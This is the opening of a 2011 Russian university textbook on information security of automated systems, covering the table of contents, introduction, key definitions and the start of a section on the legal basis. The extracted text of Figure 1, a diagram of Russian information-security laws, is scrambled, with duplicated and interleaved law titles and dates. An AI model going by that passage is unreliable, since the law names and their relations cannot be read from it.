ИНФОРМАЦИОННАЯ БЕЗОПАСНОСТЬ АВТОМАТИЗИРОВАННЫХ СИСТЕМ Учебное пособие
Издание второе, расширенное и доработанное
Воронеж 2011 УДК 681.5(519.8765)
Рецензенты: Заведующий кафедрой естественнонаучных дисциплин Рос- сийского государственного социального университета филиал г. Воронеж доктор технических наук, профессор В.С. Стародубцев; Профессор кафедры автоматизированных и вычислительных систем Воронежского государственного технического университета доктор технических наук, профессор О.Я.Кравец.
С.А. Будников, Н.В. Паршин
Информационная безопасность автоматизированных систем
В учебном пособии излагаются основные понятия и определе-
ния информационной безопасности, основные принципы построения систем и средств обеспечения информационной безопасности, клас- сификация объектов защиты информации. Кроме того, важнейшим аспектом пособия является изучение методов, средств обеспечения информационной безопасности в автоматизированных системах, назначение и структура операционных систем, применяемых в со- ставе вычислительных комплексов средств различного назначения. Учебное пособие рассчитано на студентов, обучающихся по специальности 090105 "Комплексное обеспечение информационной безопасности автоматизированных систем". Оно может быть полез- но руководителям и специалистам структурных подразделений по защите информации в федеральных органах исполнительной вла- сти, администрациях субъектов Российской Федерации, органах местного самоуправления, организациях и учреждениях.
ISBN 978-5-87456-944-0 Будников С.А., Паршин Н.В., 2011
2 СОДЕРЖАНИЕ ВВЕДЕНИЕ ...................................................................................... 9 1. ОСНОВЫ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ В АВТОМАТИЗИРОВАННЫХ СИСТЕМАХ .. 12 1.1. Некоторые проблемы обеспечения информационной безопасности в Российской Федерации ........................................... 12 1.2. Основные термины и определения.............................. 14 1.3. Правовые основы защиты информации...................... 19 1.3.1. Цели защиты информации ....................................... 21 1.4. Категории информации ................................................ 22 1.4.1. Режимы защиты информации ................................. 26 1.5. Классификация компьютерных преступлений .......... 28 1.6. Руководящие документы ФСТЭК России (Гостехкомиссии России) в области обеспечения информационной безопасности ........................................................ 31 1.6.1. Критерии и классы защищенности автоматизированных систем ............................................................. 38 1.6.2. Показатели защищенности межсетевых экранов .. 42 1.7. Классификация угроз безопасности информации ..... 44 1.8. Основные методы нарушения конфиденциальности, целостности и доступности информации ........................................ 48 1.9. Атаки на автоматизированные системы ..................... 51 1.9.1. Атаки на уровне систем управления базами данных 52 1.9.2. Атаки на уровне операционной системы ............... 54 1.9.3. Атаки на уровне сетевого программного обеспечения 67 2. ОСНОВЫ ПОСТРОЕНИЯ СИСТЕМ И МОДЕЛИ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ АС .. 70 2.1. Основные принципы построения систем защиты АС 70 2.2. Задачи системы защиты информации и меры их реализации 72 2.3. Методы и средства обеспечения информационной безопасности ....................................................................................... 76 2.3.1. Формальные средства защиты ................................ 78 2.3.2. Программные средства обеспечения информационной безопасности ........................................................ 84
3 2.4. Организация защиты от случайных воздействий и аварийных ситуаций .......................................................................... 85 2.4.1. Защита информации от случайных воздействий .. 85 2.4.2. Защита информации от аварий ............................... 88 2.5. Модели ограничения доступа и разделения привилегий на доступ ........................................................................ 89 2.6. Абстрактные модели управления доступа ................. 90 2.6.1. Модель Биба .............................................................. 90 2.6.2. Модель Гогена-Мезигера......................................... 90 2.6.3. Сазерлендская модель .............................................. 91 2.6.4. Модель Кларка-Вильсона ........................................ 91 2.7. Современные модели управления доступом.............. 91 2.8. Системы разграничения доступа ................................. 95 2.8.1. Списки управления доступом к объекту................ 98 2.8.2. Списки полномочий субъектов ............................... 98 2.8.3. Атрибутные схемы ................................................... 99 2.9. Управление механизмами разграничения доступа . 100 2.9.1. Ограничение доступа ............................................. 102 2.9.2. Разделение привилегий на доступ ........................ 104 2.9.3. Контроль доступа к аппаратуре ............................ 105 2.9.4. Разграничение и контроль доступа к информации 106 3. КРИПТОГРАФИЧЕСКИЕ МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ ............................................................... 109 3.1. Основные понятия криптографического преобразования информации .......................................................... 109 3.1.1. Основные методы шифрования ............................ 115 3.1.2. Системы шифрования с закрытым ключом ......... 117 3.1.3. Системы шифрования с открытым ключом ........ 119 3.2. Архитектура алгоритмов ЭЦП .................................. 122 3.2.1. Постановка и проверка подписи ........................... 122 3.2.2. Контроль целостности ........................................... 124 3.2.3. Криптографические методы защиты .................... 127 3.3. Парольные средства защиты...................................... 136 3.3.1. Ограничение доступа к ресурсам информационной системы 138 3.3.2. Принципы работы парольных взломщиков ......... 139 3.3.3. Практика применения паролей ............................. 140
4 3.4. Механизмы функционирования парольных кешей операционных систем ...................................................................... 142 3.4.1. Пароли в Linux ........................................................ 142 3.4.2. Теория и практика аудита и восстановления паролей Windows NT/2000/XP/Vista/Seven/Vista/Seven ............... 143 3.4.3. Защитные механизмы ОС МСВС ......................... 151 3.5. Рекомендации по повышению эффективности парольной защиты ............................................................................ 157 3.5.1. Рекомендации администратору Windows NT/2000/XP/Vista/Seven................................................................... 157 3.6. Средства защиты файлов и документов ................... 161 3.6.1. Механизмы паролирования архиваторов ............. 162 3.6.2. Механизмы паролирования документов Microsoft Office и VBA. 165 3.6.3. Microsoft Word и Excel ........................................... 165 3.6.4. Microsoft Access ...................................................... 166 4. МЕТОДЫ И СРЕДСТВА ЗАЩИТЫ ИНФОРМАЦИИ ОТ ПРОГРАММНО-МАТЕМАТИЧЕСКИХ УГРОЗ ............................ 171 4.1. Современные программно-математические угрозы информационной безопасности в АС ............................................ 171 4.1.1. Классификация программно-математических угроз 171 4.1.2. Компьютерные вирусы .......................................... 176 4.1.3. Механизмы действия компьютерных вирусов .... 179 4.2. Программные закладки............................................... 185 4.3. Средства нарушения безопасности сетей в АС ....... 186 4.4. Классификация троянских программ ........................ 188 4.5. Проблемы безопасности информации при распределенной обработки информации ....................................... 190 4.5.1. Особенности Java – технологий ............................ 190 4.5.2. Проблемы безопасности языков сценариев ......... 194 4.5.3. Типовые уязвимости в системе защиты Java ....... 196 4.5.4. Особенности технологии Cookies ......................... 199 4.5.5. Типовые уязвимости файлов Cookies ................... 201 4.5.6. Особенности и типовые уязвимости HTML ........ 202 4.5.7. Особенности технологии ActiveX......................... 204 4.5.8. Типовые уязвимости в элементах ActiveX .......... 209 4.6. Методы и способы обнаружения и анализа алгоритма вируса 211
5 4.6.1. Анализ алгоритма вируса ...................................... 211 4.6.2. Обнаружение неизвестного вируса ...................... 215 4.7. Методы восстановления пораженных объектов ...... 226 4.7.1. Нейтрализация компьютерных вирусов .............. 228 4.7.2. Восстановление пораженных объектов ............... 230 4.7.3. Инструменты, необходимые для обнаружения, анализа и нейтрализации вредоносных программ ....................... 233 5. ПРОГРАММНО-АППАРАТНЫЕ СРЕДСТВА ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ ....... 235 5.1. Методы и средства защиты информации от утечки по каналам электромагнитных излучений и наводок ....................... 235 5.1.1. Особенности формирования каналов утечки ...... 235 5.1.2. Защита информации от утечки по каналам ПЭМИН 236 5.1.3. Методы и средства защиты от электромагнитных излучений и наводок ........................................................................ 239 5.2. Современные технологии повышения надежности и отказоустойчивости ......................................................................... 244 5.3. Программно-аппаратные системы защиты .............. 258 5.4. Аппаратно-программные средства контроля доступа 260 5.5. Межсетевые экраны .................................................... 271 5.6. Средства, методы и типы сканирования состояния информационной безопасности ...................................................... 278 5.6.1. Механизмы работы сканеров ................................ 281 5.6.2. Этапы сканирования .............................................. 284 5.6.3. Особенности применения сканеров...................... 287 5.6.4. Особенности реализации сканеров ....................... 290 5.7. Методы и средства обнаружения удаленных атак .. 290 5.7.1. Методы, используемые для получения информации об атаках 290 5.7.2. Состав системы обнаружения атак ....................... 295 6. СИСТЕМНЫЕ ВОПРОСЫ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ ..................................... 299 6.1. Основные виды моделей обеспечения информационной безопасности...................................................... 304 6.2. Общая характеристика математических методов оценки и обоснования требований к СЗИ ..................................... 305
6 6.3. Анализ методов решения задачи выборки рационального варианта СЗИ ......................................................... 306 6.4. Оценка эффективности обеспечения информационной безопасности в АС ........................................................................... 309 6.4.1. Модель элементарной защиты .............................. 309 6.5. Модель многозвенной защиты................................... 316 6.6. Модель многоуровневой защиты .............................. 319 ЗАКЛЮЧЕНИЕ ........................................................................... 328 СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ ................. 330
7 ОБОЗНАЧЕНИЯ И СОКРАЩЕНИЯ
АС - автоматизированная система АСУ - автоматизированные системы управления ЗОС - защищенная операционная система КВ - компьютерный вирус КСЗ - комплекс средств защиты ЛВС - локальная вычислительная сеть МЭ - межсетевой экран НСД - несанкционированный доступ ОС - операционная система ПК - персональный компьютер ПМВ - программно-математическое воздействие ПО - программное обеспечение ПЭМИН - побочные электромагнитные излучения и наводки СВТ - средство вычислительной техники СВЧ - сверхвысокие частоты СГИ - система графического интерфейса СЗИ - системы защиты информации СПО - сетевое (специальное) программное обеспечение СУБД - системы управления базами данных ЭЗ - электронный замок
8 ВВЕДЕНИЕ Современный этап развития общества характеризуется возрастаю- щей ролью информационной сферы, представляющей собой совокуп- ность информационных ресурсов, информационной инфраструктуры, системы формирования, распространения, использования информации и регулирования возникающих при этом общественных отношений. С пе- реходом на использование автоматизированных систем (АС), информа- ция подвергается воздействию случайных процессов: неисправностям и сбоям оборудования, ошибкам операторов и т. д., которые могут приве- сти к ее разрушению, изменениям на ложную, а также создать предпо- сылки к доступу к ней посторонних лиц. С дальнейшим усложнением и широким распространением автоматизированных систем, возросли воз- можности для преднамеренного доступа к информации. Масштабы при- менения и приложения информационных технологий стали таковы, что наряду с проблемами производительности, надежности и устойчивости функционирования АС, остро встает проблема защиты циркулирующей в системах информации от несанкционированного доступа. Статистика фактов несанкционированного доступа к информации (НСД) показыва- ет, что большинство современных информационных систем достаточно уязвимо с точки зрения безопасности. Приведем некоторые факты, свидетельствующие об актуальности проблемы информационной безопасности. Каждые двадцать секунд в Соединенных Штатах имеет место пре- ступление с использованием программных средств. Недавние оценки исчисляют потери от хищения или повреждения компьютерных данных в 100 млн. долларов за год, но точная статистика не поддается учету. Общий ущерб, который понесли компании в 2002 году от НСД, оцени- вается в $24 млрд. (Forrest Research, 2002 г.). По мере развития систем управления, основанных на использова- нии ЭВМ, возникают все более серьезные требования к обеспечению защиты информации в процесс принятия решений, использования и хра- нения данных. В таких условиях проблема ее защиты приобретает еще большее значение. Этому способствовали: увеличение объемов информации, накапливаемой, хранимой и об- рабатываемой с помощью ЭВМ и других средств вычислительной техники;
9 сосредоточение в единых базах данных информации различного назначения и принадлежности; расширение круга пользователей, имеющих доступ к ресурсам вы- числительной системы и находящимся в ней массивам данных; усложнение режимов функционирования технических средств вы- числительной системы: широкое внедрение многопрограммного режима, режима разделения времени и реального времени; автоматизация межмашинного обмена информацией, в том числе и на больших расстояниях; увеличение количества технических средств и связей в автомати- зированных системах управления и обработки данных; появление персональных ЭВМ, расширяющих возможности не только пользователя, но и нарушителя. Причем данные тенденции проявляются практически для всех уровней иерархии современных информационных технологий, начиная с архитектурного уровня в целом (Internet и Intranet), включая сетевые технологии (например, IP v.4.0 и IP Sec), и заканчивая уровнем общеси- стемных средств (ОС, СУБД) и приложений [17]. Масштабность и массовость применения АС определили значи- мость обеспечения безопасности государства в информационной сфере. Это особенно подчеркнуто в принятой в сентябре 2000 года "Доктрине ин- формационной безопасности Российской Федерации": "Национальная безопасность Российской Федерации суще ственным образом зависит от обеспечения информационной безо пасности, и в ходе технического прогресса эта зависимость будет возрастать" [13]. Проблемы информационной безопасности весьма актуальны в со- временном мире, и в том числе для Российской Федерации. В материа- лах комиссии по информационной безопасности Совета безопасности России прямо говорится: "Против России ведется самая настоящая ин- формационная война. Вместе с электроникой нам зачастую поставляется зараженное вирусами программное обеспечение, которое в определен- ный момент способно парализовать всю систему управления государ- ством" [24]. Последствия разнообразных информационных воздействий и не- санкционированного использования информации могут носить весьма серьезный характер, включая, политический, связанный с опасностью возникновения войны. Не менее остро стоит вопрос информационного противоборства на уровне коммерческих организаций и отдельных граждан. Об этом свиде-
10 тельствуют многочисленные попытки криминальных элементов полу- чить контроль над компьютерными технологиями для извлечения мате- риальной выгоды. Поэтому, одной из целей данного пособия является изучение ос- новных понятий и определений информационной безопасности, предмета и объекта защиты информации, влияния проблем защищенности объекта на ход принятия решений, руководителем а также определение и рас- смотрение классификации объектов защиты информации. Кроме того, важнейшим аспектом пособия является изучение методов, средств обес- печения информационной безопасности в автоматизированных систе- мах. При подготовке книги использованы полученные в последнее время результаты отечественных и зарубежных специалистов в области защи- ты компьютерной информации. Однако в первую очередь обсуждаются теоретические и практические результаты проведенных исследований и проектирования систем обеспечения информационной безопасности в АС, а также учтен опыт, приобретенный авторами при проведении заня- тий по ряду учебных дисциплин данного профиля. Авторы не стремились излагать материал как полные знания, необ- ходимые специалистам, что и невозможно в таком небольшом объеме, а главным образом постарались через этот материал дать представление об основных направлениях и методах защиты информации, которые ре- ально используются или могут быть использованы в ближайшее время. Авторы надеются, что учебное пособие будет полезно для изуче- ния аспирантами и студентами ВУЗов, ориентированных на подготовку специалистов в области различных приложений информационных тех- нологий, в первую очередь, в области информационной безопасности, научным и инженерно-техническим работникам, занимающимся иссле- дованиями в области защиты информации. Кроме того, учебное пособие является полезным для руководителей и специалистов структурных под- разделений по защите информации в федеральных органах исполни- тельной власти, администрациях субъектов Российской Федерации, ор- ганах местного самоуправления, организациях и учреждениях. В пособие добавлены разделы, связанные с описанием защитных механизмов ОС МСВС и применения теории полумарковских процессов задачах моделирования и оценки уровня информационной безопасности автоматизированных систем. Исключены разделы посвященные описанию различных аспектов обеспечения информационной безопасности устаревших ОС.
11 1. ОСНОВЫ ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ В АВТОМАТИЗИРОВАННЫХ СИСТЕМАХ 1.1. Некоторые проблемы обеспечения информационной безопасности в Российской Федерации На современном этапе развития цивилизации информация играет ключевую роль не только в жизни каждого человека, но и в функциони- ровании общественных и государственных институтов. На наших глазах информатизация общества развивается стремительно и зачастую не- предсказуемо, а мы лишь начинаем осознавать его социальные, полити- ческие, экономические и другие последствия. Информатизация нашего общества ведет к созданию единого мирового информационного про- странства, в рамках которого производится накопление, обработка, хра- нение и обмен информацией между субъектами этого пространства — людьми, организациями, государствами. Очевидно, что возможности быстрого обмена политической, эко- номической, научно-технической и другой информацией, применение новых технологий во всех сферах общественной жизни и особенно в производстве и управлении является несомненным благом. Однако, ин- форматизация может стать источником серьезных проблем безопасности государства. Проблемными объектами становятся информационные си- стемы (включая линии передач, обрабатывающие центры и человече- ские факторы этих систем), а также информационные технологии, ис- пользуемые в системах управления. Крупномасштабное противостояние между общественными груп- пами или государствами имеет целью изменить расстановку сил в обще- стве. Оно базируется на самых передовых технологиях и понимании собственной уязвимости, особенно гражданского сектора, поэтому про- блемы защиты от "информационного терроризма" сегодня выходят на первый план. Последнее обстоятельство следует помнить руководству многих российских государственных и корпоративных сетей, которые уже активно работают в Internet и намерены подключаться к другим глобальным телекоммуникационным сетям. Уязвимость национальных информационных ресурсов стран, обес- печивающих своим пользователям работу в мировых сетях, — вещь обоюдоострая. Информационные ресурсы "противников" взаимно уяз-
12 вимы средствами уничтожения, искажения или хищения информацион- ных массивов, средствами преодоления систем защиты, ограничения до- пуска законных пользователей. Приведенные факты свидетельствует о том, что сейчас как никогда актуальна проблема информационного вторжения в компьютерные сети. Выход этой угрозы на первый план связан с тем, что современные системы управления являются системами критических приложений с высоким уровнем компьютеризации. Считается, что для предотвращения или нейтрализации послед- ствий применения информационного оружия необходимо принять сле- дующие меры[26]: защита материально-технических объектов, составляющих физи- ческую основу информационных ресурсов; обеспечение нормального и бесперебойного функционирования баз и банков данных; защита информации от несанкционированного доступа, ее иска- жения или уничтожения; сохранение качества информации (своевременности, точности, полноты и не обходимой доступности). Создание технологий обнаружения воздействий на информацию, в том числе в открытых сетях, — это естественная защитная реакция на появление нового оружия. Экономическую и научно-техническую поли- тику подключения государства к мировым открытым сетям следует рас- сматривать через призму информационной безопасности. Будучи откры- той, ориентированной на соблюдение законных прав граждан на инфор- мацию и интеллектуальную собственность, эта политика должна преду- сматривать защиту сетевого оборудования на территории страны от проникновения в него элементов информационного оружия. Это осо- бенно важно сегодня, когда осуществляются массовые закупки зарубеж- ных информационных технологий. Понятно, что без подключения к мировому информационному про- странству страну ожидает экономическое прозябание. Оперативный до- ступ к информационным и вычислительным ресурсам, поддерживаемым сетью Internet, разумеется, следует приветствовать как фактор преодоле- ния международной изоляции и внутренней дезинтеграции, как условие укрепления государственности, институтов гражданского общества, раз- вития социальной инфраструктуры. Однако следует отчетливо представлять, что участие России в меж- дународных системах телекоммуникаций и информационного обмена невозможно без комплексного решения проблем информационной без-
13 опасности. Особенно остро проблемы защиты собственных информаци- онных ресурсов в открытых сетях встают перед странами, которые тех- нологически отстают в области информационных и телекоммуникаци- онных технологий от США или Западной Европы [21]. К числу таких стран, к сожалению, относится и Россия. Сегодняшнее состояние рос- сийской экономики, неразвитость информационной инфраструктуры, неподготовленность российских пользователей к эффективной работе в открытых сетях не позволяют реализовать полноценное участие страны в таких сетях и пользоваться всеми новыми технологиями. Следует помнить о защите национальных информационных ресур- сов и сохранении конфиденциальности информационного обмена по мировым открытым сетям. Вполне вероятно, что на этой почве могут возникать политическая и экономическая конфронтация государств, но- вые кризисы в международных отношениях. Обеспечение безопасности автоматизированной системы предпола- гает создание препятствий для любого несанкционированного вмеша- тельства в процесс ее функционирования, а также для попыток хищения, модификации, выведения из строя или разрушения всех ее компонентов. Исследования проблемы обеспечения безопасности автоматизиро- ванных систем ведутся по многим направлениям. Серьезно изучается статистика нарушений, вызывающие их причины, личности нарушите- лей, суть применяемых нарушителями приемов и средств, используемые при этом недостатки систем и средств их защиты, обстоятельства, при которых было выявлено нарушение, и другие вопросы. Прежде всего, необходимо разобраться, что такое безопасность ин- формационных отношений, определить что (кого), от чего, почему и за- чем надо защищать. Только получив четкие ответы на данные вопросы, можно правильно сформулировать общие требования к системе обеспе- чения безопасности и переходить к обсуждению вопросов построения соответствующей защиты.
1.2. Основные термины и определения
В связи с имеющимися в настоящее время различным пониманием и толкованием специалистами некоторых терминов и определений целе- сообразно вначале ознакомиться с основными терминами и определени- ями, которые используются при изучении дисциплины "Программно- аппаратные средства обеспечения информационной безопасности". Область информационной безопасности охватывает практически все основные сферы жизнедеятельности общества, куда входят полити-
14 ческая, экономическая, социально-психологическая, научно- производственная, религиозная, военная, а также сферы международных отношений и массовой информации. Три составляющие комплексной системы информационной без- опасности, на совершенствование которых должно быть направлено внимание государственных структур. К этим составляющим относятся следующие виды обеспечения: нормативно-правовое, организационное и технологическое. При этом каждый из видов обеспечения может иметь общие и частные аспекты своего развития. Национальная безопасность обеспечивается путем предотвраще- ния или парирования внутренних и внешних угроз в различных сферах жизни общества - политической, экономической, оборонной, экологиче- ской, информационной и др. В каждой из этих сфер государство, выражающее интересы всего общества, обязано принимать меры, предотвращающие угрозы безопас- ности. В доктрине информационной безопасности РФ под информа- ционной безопасностью понимается состояние защищенности ин- формационной среды общества, обеспечивающее ее формирование и развитие в интересах граждан, организаций и государства [13]. Мы будем рассматривать частное определение, которое приведено ниже. Информация - сведения о лицах, предметах, фактах, событиях, яв- лениях и процессах независимо от формы их представления. Информация может существовать в различных формах представле- ния на носителях различных типов. Рассмотрим только те формы пред- ставления информации, которые используются субъектами при ее авто- матизированной обработке. В дальнейшем субъектами будем называть, общественные или коммерческие организации и предприятия (юридиче- ские лица), отдельных граждан (физические лица). Защищаемой информацией называют информацию, являющуюся предметом собственности и подлежащую защите в соответствии с тре- бованиями правовых документов или требованиями, установленными собственником информации. Однако защите подлежит не всякая информация, а только та, ко- торая имеет цену. Ценной становится та информация, обладание кото- рой позволит ее существующему и потенциальному владельцу получить какой-либо выигрыш: военный, моральный, материальный, политиче- ский и т.д.
15 Под информационной безопасностью понимается защищенность информационной системы от случайного или преднамеренного вмеша- тельства, наносящего ущерб владельцам или пользователям информации. На практике важнейшими являются три аспекта информационной безопасности: доступность, целостность, конфиденциальность. Доступность информации – свойство информации, технических средств и технологии ее обработки, характеризующееся способностью обеспечивать беспрепятственный доступ к информации субъектов, име- ющих на это надлежащие полномочия. Целостность информации – свойство информации, технических средств и технологии ее обработки, характеризующееся способностью противостоять несанкционированному или непреднамеренному уничто- жению и искажению информации. Конфиденциальность информации –обязательное для выполне- ния лицом, получившим доступ к определенной информации, требова- ние не передавать такую информацию третьим лицам без согласия ее обладателя. Автоматизированная система - организационно-техническая си- стема, представляющая собой совокупность следующих взаимосвязан- ных компонентов: технических средств обработки и передачи данных (средств вы- числительной техники и связи); методов и алгоритмов обработки в виде соответствующего про- граммного обеспечения; информации (массивов, наборов, баз данных) на различных носи- телях; персонала и пользователей системы, объединенных по организа- ционно-структурному, тематическому, технологическому или дру- гим признакам для выполнения автоматизированной обработки информации (данных) с целью удовлетворения информационных потребностей субъектов информационных отношений. Комплекс средств автоматизации обработки информации - территориально-сосредоточенный комплекс аппаратных и программных средств, выполняющих общую задачу по автоматизированной обработке информации: вычислительная система, узел коммутации, абонентский пункт, система телеобработки данных и т. д. Информационная безопасность АС - состояние защищенности рас- сматриваемой АС, при котором она, с одной стороны, способна противо- стоять дестабилизирующему воздействию внешних и внутренних инфор-
16 мационных угроз, а с другой - ее наличие и функционирование не создает информационных угроз для элементов самой системы и внешней среды. Одной из особенностей обеспечения информационной безопасности в АС является то, что абстрактным понятиям, таким как "субъект досту- па", "информация" и т.п., ставятся в соответствие физические представ- ления в среде вычислительной техники: для представления "субъектов доступа" - активные программы и процессы, для представления инфор- мации - машинные носители информации в виде внешних устройств компьютерных систем (терминалов, печатающих устройств, различных накопителей, линий и каналов связи), томов, разделов и подразделов то- мов, файлов, записей, полей записей, оперативной памяти и т.д. Нарушитель в вычислительной системе - посторонний человек или законный пользователь, предпринимающий попытку несанкциони- рованного доступа к информации в корыстных интересах, для развлече- ния или самоутверждения. Несанкционированный доступ к информации (НСД) - несанкцио- нированные действия нарушителя, выразившиеся в разрушении, хище- нии, модификации информации или ознакомлении с ее содержанием, используя возможности этих технических средств Объект защиты информации - система обработки данных, содер- жащая информацию, подлежащую защите. Предмет защиты в АС - информация, подлежащая защите, ука- занная в техническом задании на АС. Система защиты информации - система, встроенная в структуру АС, представляющая собой регулируемый целостный механизм, состо- ящий из системы взаимосвязанных централизованно управляемых пре- град, перекрывающих каналы несанкционированного доступа к инфор- мации, подлежащей защите. Угроза безопасности информации – случайная или преднамерен- ная деятельность людей или физической явление, которые могут приве- сти к нарушению безопасности информации. Источник угрозы безопасности информации – любое физиче- ское лицо, материальный объект или явление, создающие угрозу без- опасности информации при ее обработке техническими средствами. Утечка информации – утрата свойств конфиденциальности ин- формации. Искажение информации – любое преднамеренное или случайное изменение информации при ее обработке техническими средствами, ме- няющее содержание этой информации.
17 Уничтожение информации – действие, в результате которого информация перестает физически существовать в технических средствах ее обработки. Подделка информации – преднамеренное действие по созданию ложной информации в технических средствах ее обработки. Блокирование информации – прекращение или затруднение до- ступа законных пользователей к информации при ее обработке техниче- скими средствами. Программно-математическое воздействие (ПМВ) – нарушение безопасности информации с помощью специально создаваемых в этих целях программ. Аппаратная закладка – электронное устройство, встраиваемое или подключаемое к элементам технических средств обработки инфор- мации в целях нарушения безопасности информации при ее обработке техническими средствами. Под обработкой информации в АС будем понимать любую сово- купность операций (сбор, накопление, хранение, преобразование, отоб- ражение, выдача и т.п.), осуществляемых над информацией (сведениями, данными) с использованием средств АС. Различные субъекты по отношению к определенной информации могут выступать в качестве (возможно одновременно): источников (поставщиков) информации; обладатель информации; физических и юридических лиц, о которых собирается информа- ция; владельцев систем сбора и обработки информации и участников процессов обработки и передачи информации и т.д. Для организации эффективной обработки информации возникает необходимость в обеспечении: своевременного доступа к необходимой им информации; конфиденциальности (сохранения в тайне) определенной инфор- мации; достоверности (полноты, точности, адекватности, целостности) информации; защиты от навязывания им ложной (недостоверной, искаженной) информации (то есть от дезинформации); защиты части информации от незаконного ее тиражирования (за- щиты авторских прав, прав собственника информации и т.п.);
18 возможности осуществления непрерывного контроля и управления процессами обработки и передачи информации. В качестве объектов, подлежащих защите в интересах обеспече- ния безопасности субъектов информационных отношений, должны рас- сматриваться: информация, ее носители и процессы ее обработки. Однако всегда следует помнить, что уязвимыми, в конечном счете, яв- ляются именно субъекты, заинтересованные в обеспечении определен- ных свойств информации и систем ее обработки. В дальнейшем, говоря об обеспечении безопасности АС или циркулирующей в системе ин- формации, всегда будем понимать под этим косвенное обеспечение без- опасности субъектов, участвующих в процессах автоматизированного информационного взаимодействия. Таким образом, конечной целью обеспечения информационной без- опасности в АС и защиты циркулирующей в ней информации является предотвращение или минимизация наносимого субъектам информаци- онных отношений ущерба (прямого или косвенного, материального, мо- рального или иного) посредством нежелательного воздействия на ком- поненты АС, а также разглашения (утечки), искажения (модификации), утраты (снижения степени доступности) или незаконного тиражирова- ния информации. Наибольшую сложность при решении вопросов обеспечения без- опасности конкретных информационно-управляющих систем (информа- ционных технологий) представляет задача определения реальных требо- ваний к уровням защиты критичной для субъектов информации, цирку- лирующей в АС.
1.3. Правовые основы защиты информации
Информация играет особую роль в процессе развития цивилизации. Владение информационными ресурсами создает предпосылки прогрес- сивного развития общества. Искажение информации, блокирование про- цесса ее получения или внедрение ложной информации, способствуют принятию ошибочных решений. Основой законодательного обеспечения информационной безопас- ности является Конституция Российской Федерации, в которой закреп- лено право граждан, организаций и государства на тайну. Структура за- конодательной базы информационной безопасности России представле- на на рис.1.
19 Конституция Российской Федерации Концепция национальной безопасности Закон РФ «О безопасности» Доктрина информационной ФЗ от 27.07.2006 N 149-ФЗ безопасности РФ "ОБ ИНФОРМАЦИИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЯХ И О ЗАЩИТЕ ИНФОРМАЦИИ"
Законы РФ, Законы РФ Документы РФ,
определяющие работу с об отдельных видах регулирующие информацией различных информационного международный видов обеспечения Информационный обмен
ФЗ от 27.07.2006 N 152-ФЗ ФЗотот10.01.2002
ФЗ от 27.07.2006 N 152-ФЗ ФЗ 10.01.2002NN1-ФЗ 1-ФЗ"ОБ "ОБ УКАЗПрезидента УКАЗ УКАЗ ПрезидентаРФ ПРЕЗИДЕНТА РФот РФ от ОТ "О ПЕРСОНАЛЬНЫХДАННЫХ" "ОПЕРСОНАЛЬНЫХ ДАННЫХ" ЭЛЕКТРОННОЙ ЦИФРОВОЙ 17.03.2008 12.05.2004 N 351 N 611 ЭЛЕКТРОННОЙ ЦИФРОВОЙ 12.05.2004 "О N 611 ПОДПИСИ" ПОДПИСИ" "ОМЕРАХ МЕРАХПО ПО ОБЕСПЕЧЕ- ЗАКОНРФ ЗАКОН РФот от21.07.1993 21.07.1993NN5485-1 5485-1 "О НИЮМЕРАХ ПО ИНФОРМАЦИОННОЙ ЗАКОН РФотот27.12.1991 ОБЕСПЕЧЕНИЮ ГОСУДАРСТВЕННОЙТАЙНЕ" "ОГОСУДАРСТВЕННОЙ "О ТАЙНЕ" ЗАКОН РФ 27.12.1991NN2124-1 2124-1 ОБЕСПЕЧЕНИЮ БЕЗОПАСНОСТИ РОССИЙ- "О СРЕДСТВАХ МАССОВОЙ ИНФОРМАЦИОННОЙ СКОЙ ФЕДЕРАЦИИ ПРИ "О СРЕДСТВАХ МАССОВОЙ ИНФОРМАЦИОННОЙ ФЗот ФЗ от29 29июля июля2004 2004года годаNN98-ФЗ 98-ФЗ ИНФОРМАЦИИ" БЕЗОПАСНОСТИИНФОР- ИСПОЛЬЗОВАНИИ БЕЗОПАСНОСТИ ИНФОРМАЦИИ" ?О“О КОММЕРЧЕСКОЙ ТАЙНЕ” КОММЕРЧЕСКОЙ ТАЙНЕ? ЗАКОН РФ “О АРХИВНОМ РОССИЙСКОЙ МАЦИОННО- РОССИЙСКОЙ Закон ФОНДЕРФ«О архивном И АРХИВАХ” ТЕЛЕКОММУНИКАЦИОН- ФЕДЕРАЦИИ ФЕДЕРАЦИИ ВВСФЕРЕ СФЕРЕ Закон РФ“О ПРАВОВОЙ ОХРАНЕ ЗАКОН РФ Фонде и архивах» НЫХ СЕТЕЙ МЕЖДУНА- МЕЖДУНАРОДНОГО МЕЖДУНАРОДНОГО РОДНОГО ИНФОРМАЦИ- ?О правовой ПРОГРАММ ДЛЯ охране программ ЭВМ И БАЗ ДАННЫХ” ЗАКОН РФРФ Закон ИНФОРМАЦИОННОГО ИНФОРМАЦИОННОГО ОННОГО ОБМЕНА" для ЭВМ и баз данных? “О«О СТАТИСТИЧЕСКОЙ статистической ОБМЕНА" ОБМЕНА" ИНФОРМАЦИИ” информации»
Рис. 1. Структура законодательной базы информационной без-
опасности России Конституцией также гарантируется такое важнейшее право, как право свободно искать, получать, передавать, производить и распро- странять информацию любым законным способом, при этом в соответ- ствии со статьей 55. Конституции эти права могут быть ограничены только федеральным законом и лишь в той мере, в которой это необхо- димо в целях защиты основ конституционного строя, нравственности, здоровья, прав и законных интересов других лиц, обеспечения обороны страны и безопасности государства. Сочетание этих двух принципов требует жесткой регламентации вопросов информационной безопасности в законодательстве, прежде всего, требует определение законных способов поиска, получения, пере- дачи, производства и распространения информации, а также регламен- тации вопросов, определяющих отношение информации к той или иной тайне. Поэтому, без четких границ, определяющих информацию, как объ- ект права, применение любых законодательных норм по отношению к ней - весьма проблематично. До недавнего времени это было довольно важной причиной, усложняющей регулирование правовых отношений в
